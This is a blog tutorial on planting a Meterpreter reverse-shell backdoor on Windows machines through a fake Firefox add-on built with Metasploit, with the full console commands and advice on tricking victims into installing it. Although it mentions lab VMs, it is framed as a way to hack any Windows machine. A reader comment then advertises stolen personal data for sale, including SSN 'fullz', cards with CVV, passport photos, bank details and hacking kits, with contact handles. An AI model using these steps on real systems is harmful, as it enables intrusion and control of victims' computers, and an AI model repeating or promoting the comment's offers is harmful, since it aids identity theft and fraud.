Hello In this tutorial i am going to explain how to hack any windows machine(xp,7) with the help of Metasploit.
Unlike last tutorial, we are not going to exploit any kind of vulnerabilities. We are going to use Social Engineering technique instead.
Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
Trick users into installing the add-on
Break into the Target Machine.
Pre-configuration:
As usual, you have to set up two virutal machines(VM ) in your virtualbox namely “Target” and “Attacker”.
Install the windows xp or 7 in the Target VM.
Install the Backtrack in the Attacker VM.
STEP 1: Update the Metasploit
As we are going to use the latest module, you are advised to update the Metasploit modules. Don’t know how to do this? No need to worry!
Open the Terminal
type msfupdate
This will update the Metasploit with latest modules :)
STEP2: Configuring settings in Metasploit for the fake-addon exploit
1) Open the Terminal and type “msfconsole” to get the Metasploit console.
2) Type “use exploit/multi/browser/firefox_xpi_bootstrapped_addon” in the console.
3) Now we have to know the list of settings available for this exploit module. In order to get the list , you can type “show options” in the console.
Unlike the last tutorial, this module has an extra settings for the module namely “addonname”.
4) Configurations
Let us configure the setting for the exploit.
type the highlighted commands one by one in the console
Command: set addonname fake
Details: Name for the fake add-on. you can change the “fake” to any name.
Command:set SRVHOST 192.168.56.11
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the “ifconfig” in the terminal. If you have trouble in getting the ip details, please drop your comment or read my previous post.
Command: set SRVPORT 80
Details: Our server is going to be accessed via the port 80(default port)
Command: set URIPATH fakeEx
Details: The path in which the fake add-on will be available to download. For ex: http://192.168.56.11/fakeEx
Command: set LHOST 192.168.56.11
Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the “ifconfig” in the terminal.
5) Payload
As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:
set payload windows/meterpreter/reverse_tcp
STEP 3: Social Engineering Attack
let us launch the exploit.
Type “exploit” in the console.
Now the exploit is started. Our fake add-on is available at, “http://192.168.56.11/fakeEx”.
Once victim visit the link, it will ask user to install the add-on in order to view the page. Once user install the add-on, the system will be backdoor-ed.
Now , You can control the victim system from meterpreter.
Please share it if you like it
Hello Everyone !
ReplyDeleteFRESH FULLZ FRESH W2 FRESH UK & CANADA STUFF FRESH DL&PASSPORT PHOTOS
Fullz available in bulk USA UK CANADA #SSN #NIN #SIN
Leads Available of All types
Forex|Crypto|Casino|Investors|Gamblers|Sweepstakes|Health Insurance
Bulk Quantity Available
DL-Photos & Passport Photos with Selfie all over the world
High CS Pros 700+ Scores Available
W-2 Forms 2025 Available for Tax Refund
KYC stuff Available
USA LLC Doc's Available with SSN & DL
Business EIN Company Pros Available
CC with CVV & Billing Address
*Many Other Stuff Available
*Very Fresh & Valid stuff
*You can visit our channel as well for the list of stuff we're providing
Here We're :
============
Telegram Channel - t.me/leadsproviderworldwide
TG User @ killhacks - @ leadsupplier
What's App - (+1) 727'''788'''6129
Discord - @ leads.seller
VK Messenger - @ leadsupplier
Signal - @ killhacks.90
Email - hacksp007 at gmail dot com
Zangi - 17-7369-4210
https://about.me/gilberthong
*We're also providing AI Stuff (Tools|Learning Stuff|AI Bots)
*Hacking & Spamming Stuff available with All tools & Tutorials
*You can get our stuff & use them to make money & also for polish your skills
Fullz Info:
===========
USA= name ssn dob dl-number address mmn phone email employee & bank info
UK= name sin dob dl-number phone email bank name sort-code & account number
Canada= name sin dob dl address phone mmn
*Germany, Spain, France, Australia Fullz Available
*DL, ID, Passport, Visa Photos available
AVAILABLE LEADS STUFF LIST:
===========================
-Casino & Gamblers Leads
-Forex, Crypto & Crypto Investors Leads
-Health Insurance & Medical Leads
-Medicare Leads with Medicare ID
-SweepStakes Fresh & Active
-Investors Leads
-Job Seekers Leads
-Payday Leads
-Mortgage Leads
-Doctors Database with Specialty Leads
-Cars Database with VIN Numbers Leads
-Loan & Bank Leads (account & routing)
-EIN Company Leads USA
-Gmail, Yahoo, Hotmail, AOL, Office365 Leads
-Education Leads
-Mixed Domain Leads (.eu, .ca, .uk, etc.)
-CFO & CEO Leads
-Banking Leads
All info will be provided Fresh, Active & Genuine
Many Other stuff we can provide
Just tell us your demand & we'll provide our best
#Leads #casinoleads #cryptoleads #fullz #usafullz #taxrefund #sweepstakes #cryptoleads
#fullzuk #canadaleads #cvvshop #forexleads #ssnfullz #kycstuff #usadlphoto
#aitools #aibots #AI #freshfullz #emailleads #cryptopayments #btc #eth #s&p500 #gold #silver
#taxrfund2026 #w2forms #usataxrefund #facebook #meta #trump #youtube #gmail #grok #gemini